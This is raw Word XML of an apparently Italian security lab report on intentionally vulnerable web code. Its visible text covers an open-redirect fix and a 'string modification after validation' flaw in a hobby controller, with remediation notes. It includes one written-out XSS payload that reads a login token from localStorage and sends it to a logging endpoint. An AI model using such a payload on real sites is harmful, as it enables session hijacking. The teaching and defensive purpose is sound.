    <w:p w14:paraId="7C0BE4B0" w14:textId="65D4028E" w:rsidR="005E7293" w:rsidRDefault="005E7293" w:rsidP="00467BBC"/>
    <w:p w14:paraId="1810C900" w14:textId="0736E42A" w:rsidR="005E7293" w:rsidRDefault="005E7293" w:rsidP="00467BBC"/>
    <w:p w14:paraId="123CEDDB" w14:textId="01F6378F" w:rsidR="005E7293" w:rsidRDefault="005E7293" w:rsidP="00467BBC"/>
    <w:p w14:paraId="16EA0687" w14:textId="52D696C9" w:rsidR="00D03FA6" w:rsidRDefault="00D03FA6" w:rsidP="00467BBC"/>
    <w:p w14:paraId="222A9BC1" w14:textId="57A3BC31" w:rsidR="00335218" w:rsidRDefault="005333DB" w:rsidP="00467BBC">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251704320" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="36D73B81" wp14:editId="3F77929F">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>241935</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3779282" cy="301415"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:wrapNone/>
            <wp:docPr id="23191024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79282" cy="301415"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="00335218">
        <w:t>Login.jsx:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2993B2F5" w14:textId="4BA36D45" w:rsidR="005E7293" w:rsidRDefault="005E7293" w:rsidP="00467BBC"/>
    <w:p w14:paraId="48D4A36B" w14:textId="77777777" w:rsidR="00D03FA6" w:rsidRDefault="005F7CDE" w:rsidP="00467BBC">
      <w:r>
        <w:t>LoginService</w:t>
      </w:r>
      <w:r w:rsidR="00335218">
        <w:t>.jsx</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02F032F9" w14:textId="75FEBE3A" w:rsidR="005E7293" w:rsidRDefault="005F7CDE" w:rsidP="00467BBC">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251705344" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="5DA2168C" wp14:editId="06A049A4">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>-535940</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3382645" cy="4330942"/>
            <wp:effectExtent l="0" t="0" r="8255" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="11331708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82645" cy="4330942"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="583E134B" w14:textId="00150DBC" w:rsidR="005E7293" w:rsidRDefault="005E7293" w:rsidP="00467BBC"/>
    <w:p w14:paraId="5206AC41" w14:textId="231FDAE0" w:rsidR="005E7293" w:rsidRDefault="005E7293" w:rsidP="00467BBC"/>
    <w:p w14:paraId="781816BA" w14:textId="25A16749" w:rsidR="005E7293" w:rsidRDefault="005E7293" w:rsidP="00467BBC"/>
    <w:p w14:paraId="075EA571" w14:textId="14F38C39" w:rsidR="005E7293" w:rsidRDefault="005E7293" w:rsidP="00467BBC"/>
    <w:p w14:paraId="1F31124B" w14:textId="31A11D38" w:rsidR="005E7293" w:rsidRDefault="005E7293" w:rsidP="00467BBC"/>
    <w:p w14:paraId="2AEF0778" w14:textId="41D9BE23" w:rsidR="005E7293" w:rsidRDefault="005E7293" w:rsidP="00467BBC"/>
    <w:p w14:paraId="6D9B8CF4" w14:textId="7F226F59" w:rsidR="005E7293" w:rsidRDefault="005E7293" w:rsidP="00467BBC"/>
    <w:p w14:paraId="2F705EA3" w14:textId="77777777" w:rsidR="005E7293" w:rsidRDefault="005E7293" w:rsidP="00467BBC"/>
    <w:p w14:paraId="53064ED3" w14:textId="77777777" w:rsidR="005E7293" w:rsidRDefault="005E7293" w:rsidP="00467BBC"/>
    <w:p w14:paraId="1C3EF95B" w14:textId="77777777" w:rsidR="005E7293" w:rsidRDefault="005E7293" w:rsidP="00467BBC"/>
    <w:p w14:paraId="5AD3CFE7" w14:textId="125E5439" w:rsidR="005F7CDE" w:rsidRDefault="005F7CDE" w:rsidP="00467BBC"/>
    <w:p w14:paraId="498761E3" w14:textId="45CB68E4" w:rsidR="00350E38" w:rsidRDefault="00350E38" w:rsidP="00467BBC"/>
    <w:p w14:paraId="7267B871" w14:textId="3D41BA27" w:rsidR="00FF363E" w:rsidRDefault="00861705" w:rsidP="00467BBC">
      <w:r>
        <w:t>Fix: bisogna validare il dominio a cui si viene reindirizzati. Se si da un dominio sbagliato si viene indirizzati comunque alla home del sito.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ED334B9" w14:textId="1D8F4FEC" w:rsidR="00861705" w:rsidRDefault="00D03FA6" w:rsidP="00467BBC">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251723776" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1EA73528" wp14:editId="23CEF0FB">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>6985</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3954145" cy="4937760"/>
            <wp:effectExtent l="0" t="0" r="8255" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="105122980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3">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect t="3853" b="6973"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3954145" cy="493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ACB86" w14:textId="2F3833CA" w:rsidR="00861705" w:rsidRDefault="00861705" w:rsidP="00467BBC"/>
    <w:p w14:paraId="207621D7" w14:textId="49D36B1E" w:rsidR="00861705" w:rsidRDefault="00861705" w:rsidP="00467BBC"/>
    <w:p w14:paraId="7BD47B5C" w14:textId="002B2C17" w:rsidR="00861705" w:rsidRDefault="00861705" w:rsidP="00467BBC"/>
    <w:p w14:paraId="4BE35DAA" w14:textId="1A399E19" w:rsidR="00861705" w:rsidRDefault="00861705" w:rsidP="00467BBC"/>
    <w:p w14:paraId="7CA30A58" w14:textId="2DA06BB7" w:rsidR="00861705" w:rsidRDefault="00861705" w:rsidP="00467BBC"/>
    <w:p w14:paraId="087A63F5" w14:textId="4B2C622B" w:rsidR="00861705" w:rsidRDefault="00861705" w:rsidP="00467BBC"/>
    <w:p w14:paraId="325C5917" w14:textId="6D8E1714" w:rsidR="00861705" w:rsidRDefault="00861705" w:rsidP="00467BBC"/>
    <w:p w14:paraId="774B91B1" w14:textId="6DAAFEF9" w:rsidR="00861705" w:rsidRDefault="00861705" w:rsidP="00467BBC"/>
    <w:p w14:paraId="777A27C9" w14:textId="74823676" w:rsidR="00861705" w:rsidRDefault="00861705" w:rsidP="00467BBC"/>
    <w:p w14:paraId="75DF6C1B" w14:textId="5EEDD732" w:rsidR="00861705" w:rsidRDefault="00861705" w:rsidP="00467BBC"/>
    <w:p w14:paraId="090F255C" w14:textId="2FB829E8" w:rsidR="00861705" w:rsidRDefault="00861705" w:rsidP="00467BBC"/>
    <w:p w14:paraId="466E991E" w14:textId="084ED87E" w:rsidR="00861705" w:rsidRDefault="00861705" w:rsidP="00467BBC"/>
    <w:p w14:paraId="5C80298A" w14:textId="77777777" w:rsidR="00861705" w:rsidRDefault="00861705" w:rsidP="00467BBC"/>
    <w:p w14:paraId="7F8AA5C1" w14:textId="3D8C4F71" w:rsidR="00296FF5" w:rsidRPr="00296FF5" w:rsidRDefault="00825307" w:rsidP="00296FF5">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Performing string modification after validation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E69C657" w14:textId="77777777" w:rsidR="00D03FA6" w:rsidRDefault="00D03FA6" w:rsidP="00825307">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="732"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="14EB9809" w14:textId="54FFA500" w:rsidR="00FF363E" w:rsidRDefault="00FF363E" w:rsidP="00825307">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="732"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">È una vulnerabilità che avviene quando </w:t>
      </w:r>
      <w:r w:rsidR="0053542A">
        <w:t>una stringa viene modificata dopo essere stata validata, creando la possibilità che tale stringa diventi malevola soltanto dopo la modifica e bypassando quindi la validazione.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35080A7D" w14:textId="636D1E8C" w:rsidR="00825307" w:rsidRDefault="0053542A" w:rsidP="00825307">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="732"/>
      </w:pPr>
      <w:r>
        <w:t>In questo esempio la f</w:t>
      </w:r>
      <w:r w:rsidR="00825307">
        <w:t xml:space="preserve">unzione </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">è </w:t>
      </w:r>
      <w:r w:rsidR="00825307">
        <w:t xml:space="preserve">inizialmente commentata per far funzionare XSS ed </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">è </w:t>
      </w:r>
      <w:r w:rsidR="00825307">
        <w:t>aggiunta come un possibile fix di XSS ma che procura un’altra vulnerabilità perché si può aggirare la validazione</w:t>
      </w:r>
      <w:r w:rsidR="00197C79">
        <w:t xml:space="preserve"> del nome dell’hobby</w:t>
      </w:r>
      <w:r w:rsidR="00825307">
        <w:t>. Payload da inviare:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A979B09" w14:textId="77777777" w:rsidR="00296FF5" w:rsidRDefault="00296FF5" w:rsidP="00296FF5">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="732"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A637D83" w14:textId="530EC296" w:rsidR="00FF363E" w:rsidRDefault="00072AFB" w:rsidP="00825307">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="732"/>
      </w:pPr>
      <w:r w:rsidRPr="00072AFB">
        <w:t>&lt;s-cript&gt;&lt;img title="&lt;/script&gt;&lt;img src onerror=" var token = localStorage.getItem('token'); var img = new Image(); img.src = 'http://localhost:3000/log?token=' + encodeURIComponent(token); "&gt;"&gt;&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21597DC6" w14:textId="77777777" w:rsidR="00FF363E" w:rsidRDefault="00FF363E" w:rsidP="00825307">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="732"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="705EBACF" w14:textId="77777777" w:rsidR="00FF363E" w:rsidRDefault="00FF363E" w:rsidP="00825307">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="732"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="110259A7" w14:textId="07C497AC" w:rsidR="00825307" w:rsidRDefault="00825307" w:rsidP="00825307">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="732"/>
      </w:pPr>
      <w:r w:rsidRPr="009A1CD7">
        <w:t>Hobb</w:t>
      </w:r>
      <w:r w:rsidR="003E3234" w:rsidRPr="009A1CD7">
        <w:t>y</w:t>
      </w:r>
      <w:r w:rsidRPr="009A1CD7">
        <w:t>Controller</w:t>
      </w:r>
      <w:r>
        <w:t>.java:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63AF26FD" w14:textId="784BDEE3" w:rsidR="00825307" w:rsidRDefault="00825307" w:rsidP="00825307">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="732"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C568D8A" w14:textId="53D4B2B7" w:rsidR="00825307" w:rsidRPr="006A185C" w:rsidRDefault="00072AFB" w:rsidP="00825307">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="732"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251730944" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1B75CE59" wp14:editId="4BDEF2FE">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>right</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>5715</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6108665" cy="4127766"/>
            <wp:effectExtent l="0" t="0" r="6985" b="635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08665" cy="4127766"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="00825307">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="440E49AC" w14:textId="64D5C750" w:rsidR="005F7CDE" w:rsidRDefault="005F7CDE" w:rsidP="00467BBC"/>
    <w:p w14:paraId="2490A340" w14:textId="0271F408" w:rsidR="005F7CDE" w:rsidRDefault="005F7CDE" w:rsidP="00467BBC"/>
    <w:p w14:paraId="5FC7E457" w14:textId="5925CEDD" w:rsidR="005F7CDE" w:rsidRDefault="005F7CDE" w:rsidP="00467BBC"/>
    <w:p w14:paraId="2F8B95EE" w14:textId="73601544" w:rsidR="005F7CDE" w:rsidRDefault="005F7CDE" w:rsidP="00467BBC"/>
    <w:p w14:paraId="3B4853E3" w14:textId="0C41CFFC" w:rsidR="005F7CDE" w:rsidRDefault="005F7CDE" w:rsidP="00467BBC"/>
    <w:p w14:paraId="4E2912C0" w14:textId="4C6919EB" w:rsidR="005F7CDE" w:rsidRDefault="005F7CDE" w:rsidP="00467BBC"/>
    <w:p w14:paraId="4417E687" w14:textId="03A65D59" w:rsidR="005F7CDE" w:rsidRDefault="005F7CDE" w:rsidP="00467BBC"/>
    <w:p w14:paraId="1751AC08" w14:textId="7CA9B489" w:rsidR="005F7CDE" w:rsidRDefault="005F7CDE" w:rsidP="00467BBC"/>
    <w:p w14:paraId="700608A6" w14:textId="08DEAE0C" w:rsidR="005F7CDE" w:rsidRDefault="005F7CDE" w:rsidP="00467BBC"/>
    <w:p w14:paraId="7503D4C9" w14:textId="55A93F0A" w:rsidR="005F7CDE" w:rsidRDefault="005F7CDE" w:rsidP="00467BBC"/>
    <w:p w14:paraId="3D8C0E26" w14:textId="48FC2BCD" w:rsidR="005F7CDE" w:rsidRDefault="005F7CDE" w:rsidP="00467BBC"/>
    <w:p w14:paraId="5E1B99BD" w14:textId="261ACEF1" w:rsidR="005F7CDE" w:rsidRDefault="005F7CDE" w:rsidP="00467BBC"/>
    <w:p w14:paraId="03E35325" w14:textId="532B2A04" w:rsidR="005F7CDE" w:rsidRDefault="005F7CDE" w:rsidP="00467BBC"/>
    <w:p w14:paraId="541FF50D" w14:textId="77777777" w:rsidR="00D03FA6" w:rsidRDefault="00D03FA6" w:rsidP="00467BBC"/>
    <w:p w14:paraId="7D68F4C9" w14:textId="1E25E000" w:rsidR="005F7CDE" w:rsidRDefault="003E3234" w:rsidP="00467BBC">
      <w:r>
        <w:t xml:space="preserve">Fix: </w:t>
      </w:r>
      <w:r w:rsidR="00617F11">
        <w:t>bisogna fare il replace del name prima di validare la stringa col pattern.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D7B2F2F" w14:textId="17E6040A" w:rsidR="005F7CDE" w:rsidRDefault="005F7CDE" w:rsidP="00467BBC"/>
    <w:p w14:paraId="4E28381E" w14:textId="4F90D0F5" w:rsidR="005F7CDE" w:rsidRDefault="00D03FA6" w:rsidP="00467BBC">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251731968" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="5517055B" wp14:editId="01AD209F">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>-295275</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5764928" cy="4091940"/>
            <wp:effectExtent l="0" t="0" r="7620" b="381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4928" cy="4091940"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C915BE3" w14:textId="295C28AA" w:rsidR="005F7CDE" w:rsidRDefault="005F7CDE" w:rsidP="00467BBC"/>
    <w:p w14:paraId="57566D7C" w14:textId="05C652A2" w:rsidR="005F7CDE" w:rsidRDefault="005F7CDE" w:rsidP="00467BBC"/>
    <w:p w14:paraId="5545157F" w14:textId="5AF0749E" w:rsidR="005F7CDE" w:rsidRDefault="005F7CDE" w:rsidP="00467BBC"/>
    <w:p w14:paraId="51C2ED48" w14:textId="5F171254" w:rsidR="005F7CDE" w:rsidRDefault="005F7CDE" w:rsidP="00467BBC"/>
    <w:p w14:paraId="65227BBC" w14:textId="19BBE8CE" w:rsidR="005F7CDE" w:rsidRDefault="005F7CDE" w:rsidP="00467BBC"/>
    <w:p w14:paraId="3511AB1B" w14:textId="5FC201E3" w:rsidR="005F7CDE" w:rsidRDefault="005F7CDE" w:rsidP="00467BBC"/>
    <w:p w14:paraId="3E84990B" w14:textId="19554259" w:rsidR="005F7CDE" w:rsidRDefault="005F7CDE" w:rsidP="00467BBC"/>
    <w:p w14:paraId="39C66E1F" w14:textId="488E958D" w:rsidR="005F7CDE" w:rsidRDefault="005F7CDE" w:rsidP="00467BBC"/>
    <w:p w14:paraId="788A29A1" w14:textId="77777777" w:rsidR="005F7CDE" w:rsidRDefault="005F7CDE" w:rsidP="00467BBC"/>
    <w:p w14:paraId="4FE52B1F" w14:textId="77777777" w:rsidR="005E7293" w:rsidRPr="00BF4ABA" w:rsidRDefault="005E7293" w:rsidP="00467BBC"/>
    <w:sectPr w:rsidR="005E7293" w:rsidRPr="00BF4AB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FC4E84"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A3D0E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376A2B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3DFE966E"/>
    <w:lvl w:ilvl="0" w:tplc="453697CE">
      <w:start w:val="14"/>
      <w:numFmt w:val="decimal"/>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11150F9"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B4883BF0"/>
    <w:lvl w:ilvl="0" w:tplc="BF269180">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1)"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="360" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:sz w:val="28"/>
        <w:szCs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55B6643D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="129A0E1C"/>
    <w:lvl w:ilvl="0" w:tplc="C6FC6A44">
      <w:start w:val="17"/>
      <w:numFmt w:val="decimal"/>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D6D2512"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A2AE66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883754529">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="491485382">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="1376348713">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="1448045462">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="1764914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55"/>
    <w:rsid w:val="00071E32"/>
    <w:rsid w:val="00072AFB"/>
    <w:rsid w:val="00093E39"/>
    <w:rsid w:val="000B2D9C"/>
    <w:rsid w:val="000F2421"/>
    <w:rsid w:val="00171715"/>
    <w:rsid w:val="00185FB3"/>
    <w:rsid w:val="00197C79"/>
    <w:rsid w:val="001A57CF"/>
    <w:rsid w:val="001C7EE3"/>
    <w:rsid w:val="001D2095"/>
    <w:rsid w:val="002666AE"/>
    <w:rsid w:val="00270956"/>
    <w:rsid w:val="00281830"/>
    <w:rsid w:val="002912F7"/>
    <w:rsid w:val="00296FF5"/>
    <w:rsid w:val="002A0868"/>
    <w:rsid w:val="002D1426"/>
    <w:rsid w:val="002F1920"/>
    <w:rsid w:val="002F292A"/>
    <w:rsid w:val="0031586D"/>
    <w:rsid w:val="00335218"/>
    <w:rsid w:val="00350230"/>
    <w:rsid w:val="00350E38"/>
    <w:rsid w:val="003620AB"/>
    <w:rsid w:val="00370316"/>
    <w:rsid w:val="00394934"/>
    <w:rsid w:val="003A418E"/>
    <w:rsid w:val="003E3234"/>
    <w:rsid w:val="00400A31"/>
    <w:rsid w:val="00443F7A"/>
    <w:rsid w:val="00447273"/>
    <w:rsid w:val="00450AE3"/>
    <w:rsid w:val="004514D2"/>
    <w:rsid w:val="00467BBC"/>
    <w:rsid w:val="00491A55"/>
    <w:rsid w:val="004A12DE"/>
    <w:rsid w:val="004A3A39"/>
    <w:rsid w:val="004B30FC"/>
    <w:rsid w:val="004D43F9"/>
    <w:rsid w:val="004E3997"/>
    <w:rsid w:val="004E4997"/>
    <w:rsid w:val="00510D75"/>
    <w:rsid w:val="005333DB"/>
    <w:rsid w:val="0053542A"/>
    <w:rsid w:val="00553627"/>
    <w:rsid w:val="00573261"/>
    <w:rsid w:val="00576284"/>
    <w:rsid w:val="005A6F04"/>
    <w:rsid w:val="005B284B"/>
    <w:rsid w:val="005B48C7"/>
    <w:rsid w:val="005D6BD8"/>
    <w:rsid w:val="005D725F"/>
    <w:rsid w:val="005E4094"/>
    <w:rsid w:val="005E7293"/>
    <w:rsid w:val="005F7CDE"/>
    <w:rsid w:val="00617F11"/>
    <w:rsid w:val="00631FB1"/>
    <w:rsid w:val="00655E59"/>
    <w:rsid w:val="00674FEC"/>
    <w:rsid w:val="006A185C"/>
    <w:rsid w:val="006B3EEC"/>
    <w:rsid w:val="006C2D8D"/>
    <w:rsid w:val="006D5B67"/>
    <w:rsid w:val="007134C2"/>
    <w:rsid w:val="007424E1"/>
    <w:rsid w:val="00747D31"/>
    <w:rsid w:val="00791AF1"/>
    <w:rsid w:val="00792C82"/>
    <w:rsid w:val="007A3300"/>
    <w:rsid w:val="007D3F5D"/>
    <w:rsid w:val="007F2270"/>
    <w:rsid w:val="00825307"/>
    <w:rsid w:val="008302E7"/>
    <w:rsid w:val="008568AE"/>
    <w:rsid w:val="00861705"/>
    <w:rsid w:val="00872EF7"/>
    <w:rsid w:val="0088250F"/>
    <w:rsid w:val="008B0B12"/>
    <w:rsid w:val="008B6F6D"/>
    <w:rsid w:val="0091567C"/>
    <w:rsid w:val="00926F16"/>
    <w:rsid w:val="00987816"/>
    <w:rsid w:val="00992E84"/>
    <w:rsid w:val="009A1CD7"/>
    <w:rsid w:val="009B3431"/>
    <w:rsid w:val="00A257E3"/>
    <w:rsid w:val="00A31A32"/>
    <w:rsid w:val="00A54E4E"/>
    <w:rsid w:val="00A74318"/>
    <w:rsid w:val="00AA4F9B"/>
    <w:rsid w:val="00AB3362"/>
    <w:rsid w:val="00AC599E"/>
    <w:rsid w:val="00AD3339"/>
    <w:rsid w:val="00AF5966"/>
    <w:rsid w:val="00B019CE"/>
    <w:rsid w:val="00B04DA2"/>
    <w:rsid w:val="00B11AA2"/>
    <w:rsid w:val="00B508DA"/>
    <w:rsid w:val="00BB112C"/>
    <w:rsid w:val="00BC247B"/>
    <w:rsid w:val="00BD03FB"/>
    <w:rsid w:val="00BE15A3"/>
    <w:rsid w:val="00BF4ABA"/>
    <w:rsid w:val="00C079D4"/>
    <w:rsid w:val="00C262C3"/>
    <w:rsid w:val="00C46E60"/>
    <w:rsid w:val="00C50370"/>
    <w:rsid w:val="00C64892"/>
    <w:rsid w:val="00C82F57"/>
    <w:rsid w:val="00C87C03"/>
    <w:rsid w:val="00CC03BC"/>
    <w:rsid w:val="00CC23BE"/>
    <w:rsid w:val="00CE1B39"/>
    <w:rsid w:val="00CE3F28"/>
    <w:rsid w:val="00D03FA6"/>
    <w:rsid w:val="00D12C9A"/>
    <w:rsid w:val="00D22103"/>
    <w:rsid w:val="00D72C3C"/>
    <w:rsid w:val="00D83D81"/>
    <w:rsid w:val="00D95D77"/>
    <w:rsid w:val="00D97650"/>
    <w:rsid w:val="00DA7D75"/>
    <w:rsid w:val="00DE1106"/>
    <w:rsid w:val="00DE4795"/>
    <w:rsid w:val="00DE7E9C"/>
    <w:rsid w:val="00E16865"/>
    <w:rsid w:val="00E464AA"/>
    <w:rsid w:val="00EB78A7"/>
    <w:rsid w:val="00EF10FE"/>
    <w:rsid w:val="00F04F57"/>
    <w:rsid w:val="00F35257"/>
    <w:rsid w:val="00F52417"/>
    <w:rsid w:val="00FA683C"/>
    <w:rsid w:val="00FC6340"/>
    <w:rsid w:val="00FC6F6C"/>
    <w:rsid w:val="00FF36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2EF9"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{0E867A0D-116B-4DF3-A746-4F8EE455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91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91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91A5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91A5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91A5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91A5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91A5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91A5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91A5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91A5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91A5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91A5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91A5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91A5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91A5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91A5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91A5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91A55"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:color w:val="272727" w:themeColor="text1" w:themeTint="D8"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Titolo">
    <w:name w:val="Title"/>
    <w:basedOn w:val="Normale"/>
    <w:next w:val="Normale"/>
    <w:link w:val="TitoloCarattere"/>
    <w:uiPriority w:val="10"/>
    <w:qFormat/>
    <w:rsid w:val="00491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1A5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1A5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91A5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91A5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91A55"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Paragrafoelenco">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normale"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="00491A55"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="Enfasiintensa">
    <w:name w:val="Intense Emphasis"/>
    <w:basedOn w:val="Carpredefinitoparagrafo"/>
    <w:uiPriority w:val="21"/>
    <w:qFormat/>
